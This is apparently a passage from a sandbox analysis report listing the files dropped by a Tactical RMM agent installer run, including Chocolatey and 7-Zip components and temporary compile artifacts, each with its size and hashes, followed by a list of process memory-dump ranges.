01ff945138480705d5934c766906b2c7c1a32b72

SHA256
367f8d1bfcf90ae86c0c33b0c8c9e6ec1c433c353d0663ebb44567607402c83d

SHA512
8b801bfbb933e0dc77090555fa258d416cbe9ed780fb1821aed532a979617082b29e0b6f8fb85f73a9e93c98981426c92c498a41c49f823707da3e6b7bb30128

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-KE3FL.tmp\tacticalagent-v2.7.0-windows-amd64.tmp

Filesize
3.0MB

MD5
98a6f8a5951e0cd9165797e1d3e076f7

SHA1
ed4258de26752f4fa26c5dbd4c6586563bb8ba93

SHA256
0017f703e8fd9af50ac081c0e34a059fee81fc9593db4cba0e113aa5069f34b6

SHA512
7294b8b5113a24df4e538bf294d133b8fd50c89a3ca0102312c0ab80030c70d87745cfc36bca9f7538682d2ad26468f4e4e3adecb921744bb0b2d54844d0ab54

Download Submit
C:\Windows\TEMP\RES6712.tmp

Filesize
1KB

MD5
213d3b29d428f582de6659ca5557b363

SHA1
43104c4f5fc04f82f33929375741ab6b93d3aecf

SHA256
52b529b54103da30e5a02a5ce3a8dbc2511769bfa093ffc6cc23467655701d3a

SHA512
7d43ffec9e90115d80ac3cecd6c9c7791bf05d7c60fbd64659d40225a147f546b779bbd12402db270f253a4a0da8f39fca645ce33cdb4a800b8962aad80b7c21

Download Submit
C:\Windows\TEMP\zqddxukn\zqddxukn.dll

Filesize
3KB

MD5
c56dbd9a6c9be4c7e2cab96472775eda

SHA1
d528d7506d9e2e2f938f44cc22c0fe5270f980cd

SHA256
f6c83de915d9e2016823aba9817c4893ff3ae989499146b455125c17739e8aad

SHA512
8dccdb71960050e1e37109247d8dbaeb1f7f38924a2a7312043be07bceb0f273cb54c22650d0e4f7923e6493ca57ff1dc23c7e33df701c9b97c2c1dbcf5accfc

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_nlmetbv2.mrb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\chocolatey.zip

Filesize
5.0MB

MD5
5a50d7b35241de27298cb4cf8537b065

SHA1
759ca835f52972c971c68db0fd1c53d76993cff9

SHA256
4e1acbdac571719f90b2566566668c448a20074e7c2e3faa37251c62af4efd86

SHA512
9c47ebb55f900211b5c7a42df8700e0dde6d8e3c8a7dbf4f16afc112231f86cbea5b8f73c3aba1f9a0e2f95e38cf6f22fa5e123671d9ad7ba7ca96aa9d77f441

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\CREDITS.txt

Filesize
50KB

MD5
7677758586925baf4e9d7573bf12f273

SHA1
2f54bd889a52ccaca36df204a663b092ad8ab7b0

SHA256
4387f7836591fd9b384d5a11c22685d5441ed8f56a15dd962c28174f60d1b35b

SHA512
a425d55248b052810ee861fa75eb5c9c139f73aa70dfee406d59b7f1cf86fed5656d24b36db4f10a606be89a073305bc32bec822bf88ed53881323d6718fc001

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\LICENSE.txt

Filesize
670B

MD5
b4ecfc2ff4822ce40435ada0a02d4ec5

SHA1
8aaf3f290d08011ade263f8a3ab4fe08ecde2b64

SHA256
a42ac97c0186e34bdc5f5a7d87d00a424754592f0ec80b522a872d630c1e870a

SHA512
eafac709be29d5730cb4ecd16e1c9c281f399492c183d05cc5093d3853cda7570e6b9385fbc80a40ff960b5a53dae6ae1f01fc218e60234f7adced6dccbd6a43

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\choco.exe.manifest

Filesize
2KB

MD5
1b3ed984f60915f976b02be949e212cb

SHA1
30bccfed65aef852a8f8563387eb14b740fd0aa3

SHA256
d715d6071e5cdd6447d46ed8e903b9b3ad5952acc7394ee17593d87a546c17fc

SHA512
3ec5b3b09ef73992eabc118b07c457eb2ca43ce733147fd2e14cccde138f220aee8cb3d525c832a20611edb332710b32a2fc151f3075e2020d8fd1606007c000

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\ChocolateyTabExpansion.ps1

Filesize
27KB

MD5
c6a2d08fa0c9291b024917995ed9260c

SHA1
fc5c7f1dd3e969a58fa8f0f8bfcb9201cc08c111

SHA256
446c847134e051e02bacad5440f5ea4d5abd93fb77516bc6fbcf69f513bdc93f

SHA512
ebd4a037c326aff60f805ed87287a251a3b74b7dfce5c5b424807c276a677d1099b718f7ec2d17a231d67f03fa1e8dbfe8e5fe278d3bc0724733dc76f0ca0c25

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\chocolateyProfile.psm1

Filesize
13KB

MD5
0f2a17396042d22183d78e9e442729a2

SHA1
ffd86487d551c72e4c5b3005cb36a9deeaeee6c1

SHA256
c28ac729836dec5384322cbe19a32479126bac5195b6c2760a853340dff440ce

SHA512
4d506d0360b746edfa5ffecf97d47c1d0441e22387ad9336ec12f471aed6047fabb55ba6f2de3179bfad6ded5de308722993b1fd272d352de8fa6a1440dc14ae

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\chocolateyScriptRunner.ps1

Filesize
16KB

MD5
da6109561e78e82df57f2c69ed40d1a8

SHA1
b481392947e52a028b5a28ee7f491e5c08e49f49

SHA256
e075e523a693669b7b88a5c955e2823a98a88508b3016c5baa01e4afcb6b54cc

SHA512
e5da2666edb1037b38ffac9334b456e590c97de1cb02d487ca218bbb1dd2a41cd5f068337a78b31ec5decc85d70cc046c25314f903fb07fa71cf375d8fa53c86

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1

Filesize
15KB

MD5
745c9f7ad93b2d0288a62fc2b3dee278

SHA1
28541f124f1d0cc65d73f052e067ea2219121b7b

SHA256
caf065552293384cce7b165d1bd942de4a5c90cc4678a93e4e1398f1f7f19322

SHA512
0ae1a96d12552071e5aad9f42d5ca97f41255fe939fc3511e8a53da1bd83135de6afce7455a7ea695284004eadf3ef9877fabe1ce5a2e89d7fd62189129e398f

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\redirects\RefreshEnv.cmd

Filesize
4KB

MD5
cc04b34e013e08cc6f4e0c66969c5295

SHA1
a33f1cb08b56828e3b742ee13cf789442dd5c12f

SHA256
8b6b1d8f6bfab3dc9fbee30d6b2f3093ea3eccd5c66e57161dbe1b8f703fa74c

SHA512
b485af21fcbb699d783e64e035595be7a117a1d6af62166c6d50ebd59ed8953141444f17f3bd07a865c9dd11aa7c75d5a4f2bdfb8b739a1668d055779f0d0c10

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\redirects\choco.exe

Filesize
142KB

MD5
e2ec62e46450d5e09e813929d97c00c7

SHA1
e22ef68df395516a8e8e13a9739578d1a48ec843

SHA256
924e37885d4b3b365225c773a6c4266ed7076494e3693ec487bec066ab5bc5f7

SHA512
5cf8ba3bfcba84cddd0f58966707681ac9067952c85412b576b0ce85b53029fd902c17273cbaba1712c99f9036e495943896a7960d8c7a5028d6b48228632743

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\redirects\choco.exe.ignore

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7z.dll.manifest

Filesize
513B

MD5
8f89387331c12b55eaa26e5188d9e2ff

SHA1
537fdd4f1018ce8d08a3d151ad07b55d96e94dd2

SHA256
6b7368ce5e38f6e0ee03ca0a9d1a2322cc0afc07e8de9dcc94e156853eae5033

SHA512
04c10ae52f85d3a27d4b05b3d1427ddc2afaccfe94ed228f8f6ae4447fd2465d102f2dd95caf1b617f8c76cb4243716469d1da3dac3292854acd4a63ce0fd239

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7z.exe

Filesize
335KB

MD5
76a0b06f3cc4a124682d24e129f5029b

SHA1
404e21ebbaa29cae6a259c0f7cb80b8d03c9e4c0

SHA256
3092f736f9f4fc0ecc00a4d27774f9e09b6f1d6eee8acc1b45667fe1808646a6

SHA512
536fdb61cbcd66323051becf02772f6f47b41a4959a73fa27bf88fe85d17f44694e1f2d51c432382132549d54bd70da6ffe33ad3d041b66771302cc26673aec7

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7zip.license.txt

Filesize
3KB

MD5
f4995e1bc415b0d91044673cd10a0379

SHA1
f2eec05948e9cf7d1b00515a69c6f63bf69e9cca

SHA256
f037e7689f86a12a3f5f836dc73004547c089e4a2017687e5e0b803a19e3888b

SHA512
e7bb1bacab6925978416e3da2acb32543b16b4f0f2289cc896194598ee9ade5c62aa746c51cf6bf4568e77e96c0a1014e4ddb968f18f95178ee8dfb1e5a72b96

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\checksum.exe

Filesize
37KB

MD5
c950a5b4cdc8b23c3b3f5d0358c8664f

SHA1
a4b49539c021ddd4457b353fb92bba68c4c25cdd

SHA256
c960a0082f589a4c1fa7c9cf60faed58cb4dbead4a42ca093e6f0d403d75db79

SHA512
0757fd2e8a31ee70dd0fa4c49a9f47783c1beff359cefcdc523461002571a2df59903f5beda78572fe079ad4af00d1749c6886f50db2db6c8da2971fa0323ddb

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\checksum.exe.config

Filesize
150B

MD5
e9ad5dd7b32c44f8a241de0e883d7733

SHA1
034c69b120c514ad9ed83c7bad32624560e4b464

SHA256
9b250c32cbec90d2a61cb90055ac825d7a5f9a5923209cfd0625fca09a908d0a

SHA512
bf5a6c477dc5dfeb85ca82d2aed72bd72ed990bedcaf477af0e8cad9cdf3cfbebddc19fa69a054a65bc1ae55aaf8819abcd9624a18a03310a20c80c116c99cc4

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\checksum.license.txt

Filesize
95B

MD5
a10b78183254da1214dd51a5ace74bc0

SHA1
5c9206f667d319e54de8c9743a211d0e202f5311

SHA256
29472b6be2f4e7134f09cc2fadf088cb87089853b383ca4af29c19cc8dfc1a62

SHA512
cae9f800da290386de37bb779909561b4ea4cc5042809e85236d029d9125b3a30f6981bc6b3c80b998f727c48eb322a8ad7f3b5fb36ea3f8c8dd717d4e8be55e

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\shimgen.exe

Filesize
554KB

MD5
97f02d9fbe04b14c5b24ec0da1944212

SHA1
a499a66fcc4c5a7ed15a28e5fa655b9ee2c0a453

SHA256
53551b1ffb15cdcf40a77470ad7ff81c0ab7ed5a24acd5ad1be3379612b9de8d

SHA512
06caa91b77d48d992e34c828af71f931445a05e90c18aa16c93be828a4811c2f0b60f6d835b26af9561b06bb9e514874b1c56fb3501b4128de7a1fa64de4db2c

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\shimgen.license.txt

Filesize
3KB

MD5
89ac7c94d1013f7b3e32215a3db41731

SHA1
1511376e8a74a28d15bb62a75713754e650c8a8d

SHA256
d4d2ef2c520ec3e4ecff52c867ebd28e357900e0328bb4173cb46996ded353f4

SHA512
9ba2b0029e84de81ffef19b4b17a6d29ee652049bb3152372f504a06121a944ac1a2b1b57c6b0447979d5de9a931186fef9bd0667d5358d3c9cb29b817533792

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
06d16fea6ab505097d16fcaa32949d47

SHA1
0c1c719831fa41cd102d0d72d61c0f46ec5b8de8

SHA256
54e15de2bef9f651d7717e2a336ac6b2ea2b723e6f29d2b153d8fbbc89aef723

SHA512
03c00f1eebb51cec11703141ae9d9c3ac589f5495bc04d8a4b043714089a9d50bd3a520e4d72b4a4c99f5b9bf5f689bf2585fa5c7d4ddbe6f71cbba0172f593a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
85f9c0ea811250bcb81c234ac16cdea5

SHA1
03a78c4eaf2bff52d1b2e18a708e73d0296f4664

SHA256
a772acd5b82369ad39c8973c445c53b2e6458b494eb48f938ab916398c7ba641

SHA512
142552dd24c95eec4dcf602a8d4a7ed6cfd8e4984bf4a1c80848b415b1dd70f54685cb319550701a589356ee6344cbfba01874861a65df8e0285aa2c4a1e571d

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
2c0bdf06d302688498d4e7f9cd669ab5

SHA1
18186323d93499e03f737f137b4ad795eb7f470b

SHA256
86cd6b95819282eee4bd6c900b27ebeddf453a90a9f6147978e9137479f36bd6

SHA512
f8f02ab1cb6906975695369183d00d7f25ec4c54c40aba5ac0a1f42312c5eff5a6774a8e84c3357415555405f7e9754deebe8335dd1fdcf693137ab044cc18fe

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\A92174CCCFF93466808DB9D3AF069CDA5A6968CA

Filesize
1KB

MD5
878b161ffa6aa898a0fe9082b1e01880

SHA1
4160ea742cbfedeb24c7adb0901a28555392d47f

SHA256
404b784df24a8fb16d4cd67780c0fbc691409dbade1e738ad855ec2b8a04e45b

SHA512
1e0817f28a3001e7f2677d1b25e9a4ab9c4e8c759b96071fe559c2ef3982a0bb57fc0f0426fd07e97113c75afad5abe514ef914a0859d0d557ef5617eb6891fd

Download Submit
\??\c:\Windows\Temp\zqddxukn\CSCC942E3CCFA640968FC26DC1F8B5F48F.TMP

Filesize
652B

MD5
93f43d063d13adf29556ea6abe93b86c

SHA1
3422c461a6f8dca3f6b381ab50a9e3a74478a56e

SHA256
d71b3b2a69d73eee878f8f9b645d08b4f588ce269c87516584fe3609092bdd57

SHA512
09ccea48dd22f080ab8b158776f50d030d22a8260f2914dc90759d0097060902ddcb2ef14395f7e6febcc5c3e419a5aa22aabd6d4631e820071fbfc8240dd354

Download Submit
\??\c:\Windows\Temp\zqddxukn\zqddxukn.0.cs

Filesize
363B

MD5
fe0a20ae8ae6560ff6da930c7a650c80

SHA1
b17a90207c3fd39abfcd37a79428961d401c0de6

SHA256
2887d6cced4527e90685dea484f31e882a7352ca66bdb5f5c7dd8924b6885dce

SHA512
d2505e75392877bc4bff0b9b145da35fb2c4fea86c6c6ee3ec7af06fb774abb27dd651242f6797e0e81127619a64662874cc1623262607de65fb332848de4531

Download Submit
\??\c:\Windows\Temp\zqddxukn\zqddxukn.cmdline

Filesize
333B

MD5
7a85179a2eb2c4e165c3675ceac6c71a

SHA1
f43182096c34cfb71777188338871f2c41753f89

SHA256
064c37bdac2f62ff861d884ab5b7d19f11ad1e936e3a2ad7979db35220e05ff9

SHA512
fa4af82cd970ca17e49544736196709b954c842f8fe0ff2cae5e76edf1fa4082e35f26c22be8e323bdde953eef531cb615e9ce75c9a2ee3d93e960cb710443b1

Download Submit
memory/916-157-0x000001EAF1510000-0x000001EAF15C5000-memory.dmp

Filesize
724KB

Download
memory/916-159-0x000001EAF15D0000-0x000001EAF15F4000-memory.dmp

Filesize
144KB

Download
memory/916-158-0x000001EAF15D0000-0x000001EAF15FA000-memory.dmp

Filesize
168KB

Download
memory/1108-2185-0x000001ED5B650000-0x000001ED5C0C8000-memory.dmp

Filesize
10.5MB

Download
memory/1108-2199-0x000001ED5C9B0000-0x000001ED5CA00000-memory.dmp

Filesize
320KB

Download
memory/1108-2235-0x000001ED5C980000-0x000001ED5C99E000-memory.dmp

Filesize
120KB

Download
memory/2676-26-0x0000000000400000-0x0000000000712000-memory.dmp

Filesize
3.1MB

Download
memory/2676-12-0x0000000000400000-0x0000000000712000-memory.dmp

Filesize
3.1MB

Download
memory/4048-1705-0x0000019C3A150000-0x0000019C3A15A000-memory.dmp

Filesize
40KB

Download
memory/4048-1704-0x0000019C3A170000-0x0000019C3A182000-memory.dmp

Filesize
72KB

Download
memory/4048-1910-0x0000019C39EE0000-0x0000019C39EE8000-memory.dmp

Filesize
32KB

Download
memory/4048-1702-0x0000019C39F30000-0x0000019C39FE5000-memory.dmp

Filesize
724KB

Download
memory/4560-71-0x0000018257350000-0x00000182573C6000-memory.dmp

Filesize
472KB

Download
memory/4560-69-0x0000018254BA0000-0x0000018254BC2000-memory.dmp

Filesize
136KB

Download
memory/4560-70-0x0000018257280000-0x00000182572C4000-memory.dmp

Filesize
272KB

Download
memory/4652-8-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/4652-5-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/4652-27-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/4968-110-0x000001E4DBC80000-0x000001E4DBC86000-memory.dmp

Filesize
24KB

Download
memory/4968-103-0x000001E4DBB60000-0x000001E4DBB7C000-memory.dmp

Filesize
112KB

Download
memory/4968-104-0x000001E4DBB80000-0x000001E4DBC35000-memory.dmp

Filesize
724KB

Download
memory/4968-105-0x000001E4C14C0000-0x000001E4C14CA000-memory.dmp

Filesize
40KB

Download
memory/4968-106-0x000001E4DBC60000-0x000001E4DBC7C000-memory.dmp

Filesize
112KB

Download
memory/4968-107-0x000001E4DBC40000-0x000001E4DBC4A000-memory.dmp

Filesize
40KB

Download
memory/4968-109-0x000001E4DBC50000-0x000001E4DBC58000-memory.dmp

Filesize
32KB

Download
memory/4968-108-0x000001E4DBCA0000-0x000001E4DBCBA000-memory.dmp

Filesize
104KB

Download
memory/4968-120-0x000001E4DBC90000-0x000001E4DBC9A000-memory.dmp

Filesize
40KB

Download